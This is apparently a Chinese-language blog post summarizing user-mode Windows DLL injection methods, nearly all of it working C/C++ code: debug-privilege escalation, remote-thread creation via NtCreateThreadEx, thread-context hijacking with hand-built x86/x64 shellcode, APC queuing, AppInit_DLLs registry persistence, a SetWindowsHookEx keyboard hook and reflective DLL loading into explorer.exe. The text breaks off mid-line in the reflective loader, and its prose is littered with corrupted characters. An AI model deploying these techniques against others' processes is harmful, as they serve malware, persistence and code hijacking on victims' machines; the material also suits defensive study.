0x01.前言
提到Dll的注入,立馬能夠想到的方法就有很多��,比如利用遠程線程、Apc等等��,這里我對Ring3層的Dll注入學習做一個總結吧�。
我把注入的方法分成六類,分別是:1.創建新線程��、2.設置線程上下背景文�����,修改寄存器�����、3.插入Apc隊列�����、4.修改注冊表��、5.掛鉤窗口消息�����、6.遠程手動實現LoadLibrary����。
那么下面就開始學習之旅吧���!
0x02.預備工作
在涉及到注入的程序中,提升程序的權限自然是必不可少的����,這里我提供了兩個封裝的函數,都可以用于提權��。第一個是通過權限令牌來調整權限�����;第二個是通過ntdll.dll的導出的未文檔化函數RtlAdjustPrivilege來調整權限�����。
// 傳入參數 SE_DEBUG_NAME�����,提升到調試權限BOOL GrantPriviledge(WCHAR* PriviledgeName){TOKEN_PRIVILEGES TokenPrivileges, OldPrivileges;DWORD dwReturnLength = sizeof(OldPrivileges);HANDLE TokenHandle = NULL;LUID uID;// 打開權限令牌if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &TokenHandle)){if (GetLastError() != ERROR_NO_TOKEN){return FALSE;}if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle)){return FALSE;}}if (!LookupPrivilegeValue(NULL, PriviledgeName, &uID)) // 通過權限名稱查找uID{CloseHandle(TokenHandle);return FALSE;}TokenPrivileges.PrivilegeCount = 1; // 要提升的權限個數TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // 動態數組����,數組大小根據Count的數目TokenPrivileges.Privileges[0].Luid = uID;// 在這里我們進行調整權限if (!AdjustTokenPrivileges(TokenHandle, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), &OldPrivileges, &dwReturnLength)){CloseHandle(TokenHandle);return FALSE;}// 成功了CloseHandle(TokenHandle);return TRUE;} 緊接著,既然我們要對目標進程注入Dll��,那么獲得目標進程的Id是不可或缺的吧��,因為OpenProcess是肯定會使用的��,這里我也提供了兩種通過目標進程映像名稱獲得進程Id的方法�����。第一種是最常見的使用TlHelp創建系統的進程快照��;第二種是借助Psapi枚舉系列函數�,不過這個方法我實現的有缺憾,32位下不能得到64位進程的Id���。
// 使用ToolHelp系列函數#include <TlHelp32.h>BOOL GetProcessIdByProcessImageName(IN PWCHAR wzProcessImageName, OUT PUINT32 ProcessId){HANDLE ProcessSnapshotHandle = INVALID_HANDLE_VALUE;PROCESSENTRY32 ProcessEntry32 = { 0 };ProcessEntry32.dwSize = sizeof(PROCESSENTRY32); // 初始化PROCESSENTRY32結構ProcessSnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // 給系統所有的進程快照if (ProcessSnapshotHandle == INVALID_HANDLE_VALUE){return FALSE;}if (Process32First(ProcessSnapshotHandle, &ProcessEntry32)) // 找到第一個{do{if (lstrcmpi(ProcessEntry32.szExeFile, wzProcessImageName) == 0) // 不區分大小寫{*ProcessId = ProcessEntry32.th32ProcessID;break;}} while (Process32Next(ProcessSnapshotHandle, &ProcessEntry32));}CloseHandle(ProcessSnapshotHandle);ProcessSnapshotHandle = INVALID_HANDLE_VALUE;if (*ProcessId == 0){return FALSE;}return TRUE;}// 使用Psapi系列枚舉函數#include <Psapi.h>BOOL GetProcessIdByProcessImageName(IN PWCHAR wzProcessImageName, OUT PUINT32 ProcessId){DWORD dwProcessesId[1024] = { 0 };DWORD BytesReturned = 0;UINT32 ProcessCount = 0;// 獲得當前操作系統中的所有進程Id����,保存在dwProcessesId數組里if (!EnumProcesses(dwProcessesId, sizeof(dwProcessesId), &BytesReturned)){return FALSE;}ProcessCount = BytesReturned / sizeof(DWORD);// 遍歷for (INT i = 0; i < ProcessCount; i++){HMODULE ModuleBase = NULL;WCHAR wzModuleBaseName[MAX_PATH] = { 0 };HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessesId[i]);if (ProcessHandle == NULL){continue;}if (EnumProcessModulesEx(ProcessHandle, &ModuleBase, sizeof(HMODULE), &BytesReturned, LIST_MODULES_ALL)){// 獲得進程第一模塊名稱GetModuleBaseName(ProcessHandle, ModuleBase, wzModuleBaseName, MAX_PATH * sizeof(WCHAR));}CloseHandle(ProcessHandle);ProcessHandle = NULL;if (lstrcmpi(wzModuleBaseName, wzProcessImageName) == 0) // 不區分大小寫{*ProcessId = dwProcessesId[i];break;}}if (*ProcessId == 0){return FALSE;}return TRUE;} 然后在比如插入Apc隊列�、掛起線程等等操作中,需要對目標進程的線程操作��,所以獲得線程Id也有必要�����,同樣的我也提供了兩種通過進程Id獲得線程Id的方法。第一個仍然是使用TlHelp創建系統的線程快照�,把所有的線程存入vector模板里(供Apc注入使用);第二個是利用ZwQuerySystemInformation大法���,枚舉系統進程信息�����,這個方法我只返回了一個線程Id��,已經夠用了�����。
// 枚舉指定進程Id的所有線程�,壓入模板中#include <vector>#include <TlHelp32.h>using namespace std;BOOL GetThreadIdByProcessId(IN UINT32 ProcessId, OUT vector<UINT32>& ThreadIdVector){HANDLE ThreadSnapshotHandle = NULL;THREADENTRY32 ThreadEntry32 = { 0 };ThreadEntry32.dwSize = sizeof(THREADENTRY32);ThreadSnapshotHandle = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); // 給系統所有的線程快照if (ThreadSnapshotHandle == INVALID_HANDLE_VALUE){return FALSE;}if (Thread32First(ThreadSnapshotHandle, &ThreadEntry32)){do{if (ThreadEntry32.th32OwnerProcessID == ProcessId){ThreadIdVector.emplace_back(ThreadEntry32.th32ThreadID); // 把該進程的所有線程id壓入模板}} while (Thread32Next(ThreadSnapshotHandle, &ThreadEntry32));}CloseHandle(ThreadSnapshotHandle);ThreadSnapshotHandle = NULL;return TRUE;}// ZwQuerySystemInformation+SystemProcessInformationtypedefNTSTATUS(NTAPI * pfnZwQuerySystemInformation)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,OUT PVOID SystemInformation,IN UINT32 SystemInformationLength,OUT PUINT32 ReturnLength OPTIONAL);BOOL GetThreadIdByProcessId(IN UINT32 ProcessId, OUT PUINT32 ThreadId){BOOL bOk = FALSE;NTSTATUS Status = 0;PVOID BufferData = NULL;PSYSTEM_PROCESS_INFO spi = NULL;pfnZwQuerySystemInformation ZwQuerySystemInformation = NULL;ZwQuerySystemInformation = (pfnZwQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwQuerySystemInformation");if (ZwQuerySystemInformation == NULL){return FALSE;}BufferData = malloc(1024 * 1024);if (!BufferData){return FALSE;}// 在QuerySystemInformation系列函數中�����,查詢SystemProcessInformation時��,必須提前申請好內存���,不能先查詢得到長度再重新調用Status = ZwQuerySystemInformation(SystemProcessInformation, BufferData, 1024 * 1024, NULL);if (!NT_SUCCESS(Status)){free(BufferData);return FALSE;}spi = (PSYSTEM_PROCESS_INFO)BufferData;// 遍歷進程��,找到我們的目標進程while (TRUE){bOk = FALSE;if (spi->UniqueProcessId == (HANDLE)ProcessId){bOk = TRUE;break;}else if (spi->NextEntryOffset){spi = (PSYSTEM_PROCESS_INFO)((PUINT8)spi + spi->NextEntryOffset);}else{break;}}if (bOk){for (INT i = 0; i < spi->NumberOfThreads; i++){// 返出找到的線程Id*ThreadId = (UINT32)spi->Threads[i].ClientId.UniqueThread;break;}}if (BufferData != NULL){free(BufferData);}return bOk;} 嗯��,目前為止����,預備工作差不多完工����,那我們就開始正題吧!
0x03.注入方法一 -- 創建新線程
創建新線程��,也就是在目標進程里�����,創建一個線程為我們服務���,而創建線程的方法我找到的有三種:1.CreateRemoteThread�;2.NtCreateThreadEx��;3.RtlCreateUserThread����。
基本思路是:1.在目標進程內存空間申請內存�����;2.在剛申請的內存中寫入Dll完整路徑����;3.創建新線程���,去執行LoadLibrary����,從而完成注入Dll���。
ps:這里直接使用從自己加載的kernel32模塊導出表中獲得LoadLibrary地址��,是因為一般情況下�����,所有進程加載這類系統庫在內存中的地址相同��!
因為只是創線程所使用的函數不一樣�,所以下面的代碼隨便放開一個創線程的步驟,屏蔽其他兩個����,都是可以成功的,這里我放開的是NtCreateThreadEx�����。
typedef NTSTATUS(NTAPI* pfnNtCreateThreadEx)(OUT PHANDLE hThread,IN ACCESS_MASK DesiredAccess,IN PVOID ObjectAttributes,IN HANDLE ProcessHandle,IN PVOID lpStartAddress,IN PVOID lpParameter,IN ULONG Flags,IN SIZE_T StackZeroBits,IN SIZE_T SizeOfStackCommit,IN SIZE_T SizeOfStackReserve,OUT PVOID lpBytesBuffer);#define NT_SUCCESS(x) ((x) >= 0)typedef struct _CLIENT_ID {HANDLE UniqueProcess;HANDLE UniqueThread;} CLIENT_ID, *PCLIENT_ID;typedef NTSTATUS(NTAPI * pfnRtlCreateUserThread)(IN HANDLE ProcessHandle,IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,IN BOOLEAN CreateSuspended,IN ULONG StackZeroBits OPTIONAL,IN SIZE_T StackReserve OPTIONAL,IN SIZE_T StackCommit OPTIONAL,IN PTHREAD_START_ROUTINE StartAddress,IN PVOID Parameter OPTIONAL,OUT PHANDLE ThreadHandle OPTIONAL,OUT PCLIENT_ID ClientId OPTIONAL);BOOL InjectDll(UINT32 ProcessId){HANDLE ProcessHandle = NULL;ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);// 在對方進程空間申請內存,存儲Dll完整路徑UINT32 DllFullPathLength = (strlen(DllFullPath) + 1);PVOID DllFullPathBufferData = VirtualAllocEx(ProcessHandle, NULL, DllFullPathLength, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (DllFullPathBufferData == NULL){CloseHandle(ProcessHandle);return FALSE;}// 將DllFullPath寫進剛剛申請的內存中SIZE_T ReturnLength;BOOL bOk = WriteProcessMemory(ProcessHandle, DllFullPathBufferData, DllFullPath, strlen(DllFullPath) + 1, &ReturnLength);LPTHREAD_START_ROUTINE LoadLibraryAddress = NULL;HMODULE Kernel32Module = GetModuleHandle(L"Kernel32");LoadLibraryAddress = (LPTHREAD_START_ROUTINE)GetProcAddress(Kernel32Module, "LoadLibraryA");pfnNtCreateThreadEx NtCreateThreadEx = (pfnNtCreateThreadEx)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateThreadEx");if (NtCreateThreadEx == NULL){CloseHandle(ProcessHandle);return FALSE;}HANDLE ThreadHandle = NULL;// 0x1FFFFF #define THREAD_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFFF)NtCreateThreadEx(&ThreadHandle, 0x1FFFFF, NULL, ProcessHandle, (LPTHREAD_START_ROUTINE)LoadLibraryAddress, DllFullPathBufferData, FALSE, NULL, NULL, NULL, NULL);/*pfnRtlCreateUserThread RtlCreateUserThread = (pfnRtlCreateUserThread)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlCreateUserThread");HANDLE ThreadHandle = NULL;NTSTATUS Status = RtlCreateUserThread(ProcessHandle, NULL, FALSE, 0, 0, 0, LoadLibraryAddress, DllFullPathBufferData, &ThreadHandle, NULL); *//*HANDLE ThreadHandle = CreateRemoteThread(ProcessHandle, NULL, 0, LoadLibraryAddress, DllFullPathBufferData, 0, NULL); // CreateRemoteThread 函數*/if (ThreadHandle == NULL){CloseHandle(ProcessHandle);return FALSE;}if (WaitForSingleObject(ThreadHandle, INFINITE) == WAIT_FAILED){return FALSE;}CloseHandle(ProcessHandle);CloseHandle(ThreadHandle);return TRUE;} 0x04.注入方法二 -- 設置線程上下背景文
設置線程上下背景文的主要目的是讓目標進程的某一線程轉去執行我們的代碼�,然后再回來做他該做的事���,而我們的代碼��,就是一串由匯編硬編碼組成的ShellCode��。
這串ShellCode做了三件事:1.傳入Dll完整路徑參數����;2.呼叫LoadLibrary函數地址��;3.返回原先的Eip或Rip��。
這里我選用的呼叫指令是ff 15 和 ff 25���,在32位下為跳轉到15(25)指令后面字節碼對應地址里面存放的地址�����,在64位下15(25)指令后面四字節存放的是偏移���,該跳轉為跳轉到換算出來的地址里面存放的地址�����,這里我把偏移寫成0��,以便于計算�。
#ifdef _WIN64// 測試 64 位 dll被注����,Bug已修復/*0:019> u 0x000002b5d5f80000000002b5`d5f80000 4883ec28 sub rsp,28h000002b5`d5f80004 488d0d20000000 lea rcx,[000002b5`d5f8002b]000002b5`d5f8000b ff1512000000 call qword ptr [000002b5`d5f80023]000002b5`d5f80011 4883c428 add rsp,28h000002b5`d5f80015 ff2500000000 jmp qword ptr [000002b5`d5f8001b]*/UINT8 ShellCode[0x100] = {0x48,0x83,0xEC,0x28, // sub rsp ,28h0x48,0x8D,0x0d, // [+4] lea rcx,0x00,0x00,0x00,0x00, // [+7] DllNameOffset = [+43] - [+4] - 7// call 跳偏移,到地址���,解*號0xff,0x15, // [+11]0x00,0x00,0x00,0x00, // [+13] 0x48,0x83,0xc4,0x28, // [+17] add rsp,28h// jmp 跳偏移����,到地址,解*號0xff,0x25, // [+21]0x00,0x00,0x00,0x00, // [+23] LoadLibraryAddressOffset// 存放原先的 rip0x00,0x00,0x00,0x00, // [+27]0x00,0x00,0x00,0x00, // [+31]// 跳板 loadlibrary地址0x00,0x00,0x00,0x00, // [+35] 0x00,0x00,0x00,0x00, // [+39]// 存放dll完整路徑// 0x00,0x00,0x00,0x00, // [+43]// 0x00,0x00,0x00,0x00 // [+47]// ......};#else// 測試 32 位 配合新寫的Dll可重復注入/*0:005> u 0x00ca000000000000`00ca0000 60 pusha00000000`00ca0001 9c pushfq00000000`00ca0002 681d00ca00 push 0CA001Dh00000000`00ca0007 ff151900ca00 call qword ptr [00000000`01940026]00000000`00ca000d 9d popfq00000000`00ca000e 61 popa00000000`00ca000f ff251500ca00 jmp qword ptr [00000000`0194002a]*/UINT8 ShellCode[0x100] = {0x60, // [+0] pusha0x9c, // [+1] pushf0x68, // [+2] push0x00,0x00,0x00,0x00, // [+3] ShellCode + 0xff,0x15, // [+7] call 0x00,0x00,0x00,0x00, // [+9] LoadLibrary Addr Addr0x9d, // [+13] popf0x61, // [+14] popa0xff,0x25, // [+15] jmp0x00,0x00,0x00,0x00, // [+17] jmp eip// eip 地址0x00,0x00,0x00,0x00, // [+21]// LoadLibrary 地址0x00,0x00,0x00,0x00, // [+25] // DllFullPath 0x00,0x00,0x00,0x00 // [+29] };#endif 整個注入過程由這些步驟組成:在目標進程申請內存(可執行內存) ---> 填充ShellCode需要的地址碼 ---> 將ShellCode寫入申請的內存 ---> SuspendThread(掛起線程)--->GetThreadContext(獲得線程上下背景文)---> 修改Context的Eip或Rip為ShellCode首地址 ---> SetThreadContext(設置剛修改過的Context)---> ResumeThread(恢復線程執行)��。
BOOL Inject(IN UINT32 ProcessId, IN UINT32 ThreadId){BOOL bOk = FALSE;CONTEXT ThreadContext = { 0 };PVOID BufferData = NULL;HANDLE ThreadHandle = OpenThread(THREAD_ALL_ACCESS, FALSE, ThreadId);HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);// 首先掛起線程SuspendThread(ThreadHandle);ThreadContext.ContextFlags = CONTEXT_ALL;if (GetThreadContext(ThreadHandle, &ThreadContext) == FALSE){CloseHandle(ThreadHandle);CloseHandle(ProcessHandle);return FALSE;}BufferData = VirtualAllocEx(ProcessHandle, NULL, sizeof(ShellCode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (BufferData != NULL){if (LoadLibraryWAddress != NULL){#ifdef _WIN64// ShellCode + 43處 存放完整路徑PUINT8 v1 = ShellCode + 43;memcpy(v1, DllFullPath, (wcslen(DllFullPath) + 1) * sizeof(WCHAR));UINT32 DllNameOffset = (UINT32)(((PUINT8)BufferData + 43) - ((PUINT8)BufferData + 4) - 7);*(PUINT32)(ShellCode + 7) = DllNameOffset;// ShellCode + 35處 放置 LoadLibrary 函數地址*(PUINT64)(ShellCode + 35) = (UINT64)LoadLibraryWAddress;UINT32 LoadLibraryAddressOffset = (UINT32)(((PUINT8)BufferData + 35) - ((PUINT8)BufferData + 11) - 6);*(PUINT32)(ShellCode + 13) = LoadLibraryAddressOffset;// 放置 rip 地址*(PUINT64)(ShellCode + 27) = ThreadContext.Rip;if (!WriteProcessMemory(ProcessHandle, BufferData, ShellCode, sizeof(ShellCode), NULL)){return FALSE;}ThreadContext.Rip = (UINT64)BufferData;#elsePUINT8 v1 = ShellCode + 29;memcpy((char*)v1, DllFullPath, (wcslen(DllFullPath) + 1) * sizeof(WCHAR)); //這里是要注入的DLL名字*(PUINT32)(ShellCode + 3) = (UINT32)BufferData + 29;*(PUINT32)(ShellCode + 25) = LoadLibraryWAddress; //loadlibrary地址放入shellcode中*(PUINT32)(ShellCode + 9) = (UINT32)BufferData + 25;//修改call 之后的地址 為目標空間存放 loaddlladdr的地址//////////////////////////////////*(PUINT32)(ShellCode + 21) = ThreadContext.Eip;*(PUINT32)(ShellCode + 17) = (UINT32)BufferData + 21;//修改jmp 之后為原來eip的地址if (!WriteProcessMemory(ProcessHandle, BufferData, ShellCode, sizeof(ShellCode), NULL)){printf("write Process Error/n");return FALSE;}ThreadContext.Eip = (UINT32)BufferData;#endif if (!SetThreadContext(ThreadHandle, &ThreadContext)){printf("set thread context error/n");return FALSE;}ResumeThread(ThreadHandle);printf("ShellCode 注入完成/r/n");}}CloseHandle(ThreadHandle);CloseHandle(ProcessHandle);return TRUE;} 0x05.插入Apc隊列
Ring3層的Apc注入是不太穩定的�,我的做法就是暴力的向目標進程的所有線程的UserMode Apc隊列(線程有兩個Apc隊列:Kernel和User)上插入Apc對象,等待他去執行該Apc里注冊的函數��。而只有當線程處于alterable狀態時����,才會查看Apc隊列是否有需要執行的注冊函數。
ps:正是因為不知道哪個線程會去處理Apc����,所以感覺Ring3層Apc注入不如其他方法好使���,不過Ring0層Apc注入還是比較穩定的�����。之前測試xp和win10都成功��,win7下注explorer進程總是崩潰����,后來捯飭半天,發現遍歷線程的時候從后往前遍歷著插入就不會崩潰Orz
int main(){......ThreadCount = ThreadIdVector.size();for (INT i = ThreadCount - 1; i >= 0; i--){UINT32 ThreadId = ThreadIdVector[i];InjectDllByApc(ProcessId, ThreadId);}......}BOOL InjectDllByApc(IN UINT32 ProcessId, IN UINT32 ThreadId){BOOL bOk = 0;HANDLE ThreadHandle = OpenThread(THREAD_ALL_ACCESS, FALSE, ThreadId);HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);UINT_PTR LoadLibraryAddress = 0;SIZE_T ReturnLength = 0;UINT32 DllFullPathLength = (strlen(DllFullPath) + 1);// 全局����,申請一次內存if (DllFullPathBufferData == NULL){//申請內存DllFullPathBufferData = VirtualAllocEx(ProcessHandle, NULL, DllFullPathLength, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (DllFullPathBufferData == NULL){CloseHandle(ProcessHandle);CloseHandle(ThreadHandle);return FALSE;}}// 避免之前寫操作失敗,每次重復寫入bOk = WriteProcessMemory(ProcessHandle, DllFullPathBufferData, DllFullPath, strlen(DllFullPath) + 1,&ReturnLength);if (bOk == FALSE){CloseHandle(ProcessHandle);CloseHandle(ThreadHandle);return FALSE;}LoadLibraryAddress = (UINT_PTR)GetProcAddress(GetModuleHandle(L"Kernel32.dll"), "LoadLibraryA");if (LoadLibraryAddress == NULL){CloseHandle(ProcessHandle);CloseHandle(ThreadHandle);return FALSE;}__try{QueueUserAPC((PAPCFUNC)LoadLibraryAddress, ThreadHandle, (UINT_PTR)DllFullPathBufferData);}__except (EXCEPTION_CONTINUE_EXECUTION){}CloseHandle(ProcessHandle);CloseHandle(ThreadHandle);return TRUE;} 0x06.修改注冊表
注冊表注入算得上是全局Hook了吧����,畢竟新創建的進程在加載User32.dll時,都會自動調用LoadLibrary去加載注冊表中某個表項鍵值里寫入的Dll路徑�����。
我們關心的這個注冊表項鍵是:HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Windows����,我們要設置的鍵值是AppInit_DLLs = “Dll完整路徑”,LoadAppInit_Dlls = 1(讓系統使用這個注冊表項)
ps:由于注入的Dll在進程創建的早期�,所以在Dll中使用函數要格外小心,因為有的庫可能還沒加載上����。
int main(){LSTATUS Status = 0;WCHAR* wzSubKey = L"SOFTWARE//Microsoft//Windows NT//CurrentVersion//Windows";HKEY hKey = NULL;// 打開注冊表Status = RegOpenKeyExW(HKEY_LOCAL_MACHINE, // 要打開的主鍵wzSubKey, // 要打開的子鍵名字地址0, // 保留,傳0KEY_ALL_ACCESS, // 打開的方式&hKey); // 返回的子鍵句柄if (Status != ERROR_SUCCESS){return 0;}WCHAR* wzValueName = L"AppInit_DLLs";DWORD dwValueType = 0;UINT8 ValueData[MAX_PATH] = { 0 };DWORD dwReturnLength = 0;// 查詢注冊表Status = RegQueryValueExW(hKey, // 子鍵句柄wzValueName, // 待查詢鍵值的名稱NULL, // 保留&dwValueType, // 數據類型ValueData, // 鍵值&dwReturnLength);WCHAR wzDllFullPath[MAX_PATH] = { 0 };GetCurrentDirectoryW(MAX_PATH, wzDllFullPath);#ifdef _WIN64wcscat_s(wzDllFullPath, L"//x64NormalDll.dll");#elsewcscat_s(wzDllFullPath, L"//x86NormalDll.dll");#endif// 設置鍵值Status = RegSetValueExW(hKey,wzValueName,NULL,dwValueType,(CONST BYTE*)wzDllFullPath,(lstrlen(wzDllFullPath) + 1) * sizeof(WCHAR));if (Status != ERROR_SUCCESS){return 0;}wzValueName = L"LoadAppInit_DLLs";DWORD dwLoadAppInit = 1;// 查詢注冊表Status = RegQueryValueExW(hKey, wzValueName, NULL, &dwValueType, ValueData, &dwReturnLength);// 設置鍵值Status = RegSetValueExW(hKey, wzValueName, NULL, dwValueType, (CONST BYTE*)&dwLoadAppInit, sizeof(DWORD));if (Status != ERROR_SUCCESS){return 0;}printf("Input Any Key To Resume/r/n");getchar();getchar();// 恢復鍵值dwLoadAppInit = 0;Status = RegQueryValueExW(hKey, wzValueName, NULL, &dwValueType, ValueData, &dwReturnLength);Status = RegSetValueExW(hKey, wzValueName, NULL, dwValueType, (CONST BYTE*)&dwLoadAppInit, sizeof(DWORD));wzValueName = L"AppInit_DLLs";ZeroMemory(wzDllFullPath, (lstrlen(wzDllFullPath) + 1) * sizeof(WCHAR));Status = RegQueryValueExW(hKey, wzValueName, NULL, &dwValueType, ValueData, &dwReturnLength);Status = RegSetValueExW(hKey, wzValueName, NULL, dwValueType, (CONST BYTE*)wzDllFullPath, 0);return 0;} 0x07.掛鉤窗口消息
掛鉤窗口消息使用了MS提供的一個API接口SetWindowsHookEx�����,他的工作原理是給帶窗口的目標進程的某個線程的某個消息掛鉤上我們Dll導出的函數,一旦消息觸發��,則導出函數就會被調用�����。前面學習到的幾種方法歸根結底是調用了LoadLibrary�����,而這個方法并沒有����。
// 注入exe關鍵代碼 給目標線程的指定消息上下鉤,走進Dll導出函數BOOL Inject(IN UINT32 ThreadId, OUT HHOOK& HookHandle){HMODULE DllModule = LoadLibraryA(DllFullPath);FARPROC FunctionAddress = GetProcAddress(DllModule, "Sub_1");HookHandle = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)FunctionAddress, DllModule, ThreadId);if (HookHandle == NULL){return FALSE;}return TRUE;}// 動態庫中導出函數extern "C"__declspec(dllexport)VOID Sub_1() // 導出函數{MessageBox(0, 0, 0, 0);} 0x08.遠程手動實現LoadLibrary
該方法學習自github上名叫ReflevtiveDllInjection��,大體上分為兩個部分�,exe和dll,下面分別簡述��。
exe:作為注入啟動程序���,在目標進程申請一塊兒PAGE_EXECUTE_READWRITE內存,將Dll以文件格式直接寫入目標進程內存空間中����,然后獲得導出函數"LoadDllByOEP"在文件中的偏移���,使用CreateRemoteThread直接讓目標進程去執行LoadDllByOEP函數。
Dll:最關鍵導出 LoadDllByOEP 函數���,在該函數里����,首先通過目標進程加載模塊ntdll.dll的導出表中獲得NtFlushInstructionCache函數地址��,在Kernel32.dll的導出表中獲得LoadLibraryA���、GetProcAddress�����、VirtualAlloc函數地址�����;然后在進程內存空間里重新申請內存����,拷貝自己的PE結構到內存里,接著修正IAT和重定向塊�,最后調用模塊OEP,完成了手動實現LoadLibrary�!
ps:寫代碼時參考《Windows PE權威指南》,對整個PE結構又有了新的認識�����。我有for循環強迫癥�。。這份代碼就全貼上了�����。
// InjectDllByOEP.cpp : 定義控制臺應用程序的入口點����。//#include "stdafx.h"#include <Windows.h>#include <iostream>#include <TlHelp32.h>using namespace std;BOOL GrantPriviledge(WCHAR* PriviledgeName);UINT32 GetLoadDllByOEPOffsetInFile(PVOID DllBuffer);UINT32 RVAToOffset(UINT32 RVA, PIMAGE_NT_HEADERS NtHeader);BOOL GetProcessIdByProcessImageName(IN WCHAR* wzProcessImageName, OUT UINT32* TargetProcessId);HANDLE WINAPI LoadRemoteDll(HANDLE ProcessHandle, PVOID ModuleFileBaseAddress, UINT32 ModuleFileSize, LPVOID lParam);CHAR DllFullPath[MAX_PATH] = { 0 };int main(){// 首先提權一波if (GrantPriviledge(SE_DEBUG_NAME) == FALSE){printf("GrantPriviledge Error/r/n");}// 接著通過進程名得到進程idUINT32 ProcessId = 0;GetCurrentDirectoryA(MAX_PATH, DllFullPath);#ifdef _WIN64// GetProcessIdByProcessImageName(L"Taskmgr.exe", &ProcessId);GetProcessIdByProcessImageName(L"explorer.exe", &ProcessId);strcat_s(DllFullPath, "//x64LoadRemoteDll.dll");#elseGetProcessIdByProcessImageName(L"notepad++.exe", &ProcessId);strcat_s(DllFullPath, "//x86LoadRemoteDll.dll");#endif// 獲得dll句柄HANDLE FileHandle = CreateFileA(DllFullPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);if (FileHandle == INVALID_HANDLE_VALUE){printf("Open File Error/r/n");return 0;}// 獲得dll文件長度UINT32 FileSize = GetFileSize(FileHandle, NULL);if (FileSize == INVALID_FILE_SIZE || FileSize == 0){printf("Get File Size Error/r/n");CloseHandle(FileHandle);return 0;}// 申請內存,保存PVOID FileData = HeapAlloc(GetProcessHeap(), 0, FileSize);if (FileData == NULL){printf("HeapAlloc Error/r/n");CloseHandle(FileHandle);return 0;}DWORD ReturnLength = 0;BOOL bOk = ReadFile(FileHandle, FileData, FileSize, &ReturnLength, NULL);CloseHandle(FileHandle);if (bOk == FALSE){printf("ReadFile Error/r/n");HeapFree(GetProcessHeap(), 0, FileData);return 0;}HANDLE ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);if (ProcessHandle == NULL){printf("OpenProcess Error/r/n");HeapFree(GetProcessHeap(), 0, FileData);return 0;}// 執行Dll中的導出函數LoadDllByOEP��,讓目標進程實現LoadLibrary功能HANDLE ThreadHandle = LoadRemoteDll(ProcessHandle, FileData, FileSize, NULL);if (ThreadHandle == NULL){goto _Clear;}WaitForSingleObject(ThreadHandle, INFINITE);_Clear:if (FileData){HeapFree(GetProcessHeap(), 0, FileData);}if (ProcessHandle){CloseHandle(ProcessHandle);}return 0;}/************************************************************************* Name : LoadRemoteDll* Param: ProcessHandle 進程句柄 (IN)* Param: ModuleBaseAddress 模塊基地址* Param: ModuleLength 模塊在文件中的大小* Param: lParam 模塊句柄* Ret : HANDLE* 將Dll以文件格式寫入目標進程內存��,并執行Dll的導出函數LoadDllByOEP************************************************************************/HANDLE WINAPI LoadRemoteDll(HANDLE ProcessHandle, PVOID ModuleFileBaseAddress, UINT32 ModuleFileSize, LPVOID lParam){HANDLE ThreadHandle = NULL;__try{if (ProcessHandle == NULL || ModuleFileBaseAddress == NULL || ModuleFileSize == 0){return NULL;}// 導出函數相對于 ModuelBaseAddress 的 OffsetUINT32 FunctionOffset = GetLoadDllByOEPOffsetInFile(ModuleFileBaseAddress);if (FunctionOffset == 0){return NULL;}// 在目標進程申請內存PVOID RemoteBufferData = VirtualAllocEx(ProcessHandle, NULL, ModuleFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (RemoteBufferData == NULL){return NULL;}// 把Dll文件寫入目標進程內存空間BOOL bOk = WriteProcessMemory(ProcessHandle, RemoteBufferData, ModuleFileBaseAddress, ModuleFileSize, NULL);if (bOk == FALSE){return NULL;}// 以文件格式去執行 Dll 中的 LoadDllByOEPLPTHREAD_START_ROUTINE RemoteThreadCallBack = (LPTHREAD_START_ROUTINE)((PUINT8)RemoteBufferData + FunctionOffset);ThreadHandle = CreateRemoteThread(ProcessHandle, NULL, 1024 * 1024, RemoteThreadCallBack, lParam, 0, NULL);}__except (EXCEPTION_EXECUTE_HANDLER){ThreadHandle = NULL;}return ThreadHandle;}/************************************************************************* Name : LoadRemoteDll* Param: ProcessHandle 進程句柄* Ret : HANDLE* 獲得LoadDllByOEP在Dll文件中的偏移量************************************************************************/UINT32 GetLoadDllByOEPOffsetInFile(PVOID DllBuffer){UINT_PTR BaseAddress = (UINT_PTR)DllBuffer;PIMAGE_DOS_HEADER DosHeader = NULL;PIMAGE_NT_HEADERS NtHeader = NULL;DosHeader = (PIMAGE_DOS_HEADER)BaseAddress;NtHeader = (PIMAGE_NT_HEADERS)((PUINT8)BaseAddress + DosHeader->e_lfanew);/*#define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b#define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b#define IMAGE_ROM_OPTIONAL_HDR_MAGIC 0x107*/if (NtHeader->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC) // pe32{}else if (NtHeader->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC) // pe64{}else{return 0;}UINT32 ExportDirectoryRVA = 